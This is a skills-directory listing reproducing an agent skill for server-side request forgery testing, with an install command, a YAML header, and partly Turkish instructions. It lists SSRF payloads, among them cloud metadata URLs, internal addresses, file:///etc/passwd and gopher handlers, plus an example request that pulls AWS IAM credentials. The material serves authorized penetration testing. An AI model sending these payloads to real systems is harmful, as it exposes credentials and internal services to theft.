Test for Server-Side Request Forgery vulnerabilities by probing cloud metadata endpoints, internal network services, and protocol handlers through user-controllable URL parameters. Tests AWS/GCP/Azure
Scanned 9/8/2026
Install to Claude Code
npx -y skills add MustafaKemal0146/fetih --skill performing-ssrf-vulnerability-exploitation --agent claude-codeInstalls into .claude/skills of the current project.
Are you the author of Performing Ssrf Vulnerability Exploitation?
Add the live security badge to your README — it updates automatically with every re-scan.
[](https://www.skillsdirectory.com/skills/mustafakemal0146-performing-ssrf-vulnerability-exploitation)More formats (shields.io, HTML) on the badges page.
---
name: performing-ssrf-vulnerability-exploitation
description: Test for Server-Side Request Forgery vulnerabilities by probing cloud metadata endpoints, internal network services, and protocol handlers through user-controllable URL parameters. Tests AWS/GCP/Azure
metadata APIs (169.254.169.254), internal port scanning via HTTP, URL scheme bypass techniques, and DNS rebinding Tespit.
tags:
- soc-operations
- vulnerability
- security-operations
- performing
- ssrf
- exploitation
- fetih
- cybersecurity
- siber-güvenlik
triggers:
- cloud
- dns
- exploit
- exploitation
- http
- incident
- performing
- ssrf
- vulnerability
category: soc-operations
source_subdomain: security-operations
nist_csf:
- DE.CM-01
- RS.MA-01
- GV.OV-01
- DE.AE-02
adapted_for: fetih
---
# Performing Ssrf Vulnerability Exploitation
## Ne Zaman Kullanılır
- conducting yaparken security assessments that involve performing ssrf vulnerability exploitation
- following yaparken: incident response procedures for related security events
- performing yaparken scheduled security testing or auditing activities
- validating yaparken security controls through hands-on testing
## Ön Gereksinimler
- Familiarity with security operations concepts and tools
- Erişim: a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
## Instructions
1. Install dependencies: `pip install requests`
2. Identify URL parameters in the target application that accept URLs or hostnames.
3. Test SSRF payloads:
- Cloud metadata: `http://169.254.169.254/latest/meta-data/`
- Internal services: `http://127.0.0.1:port/`, `http://10.0.0.1/`
- Protocol handlers: `file:///etc/passwd`, `gopher://`, `dict://`
- Bypass techniques: IP encoding, DNS rebinding, URL redirects
4. Analyze responses for information disclosure or internal access confirmation.
5. Şunu üret: vulnerability assessment report.
```bash
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json
```
## Örnekler
### AWS Metadata SSRF
```
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
```
If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.
<!--
⚔ Bu skill FETIH AI Agent icin gelistirilmistir — https://github.com/MustafaKemal0146/fetih
Yetkisiz kullanim/kopyalama tespit edilebilir.
hash: ed4b6a74f9b9c817
-->
Is this your skill, or is something wrong with this listing? Request removal or report an issue. Author removals are honored within 72 hours.
No comments yet. Be the first to comment!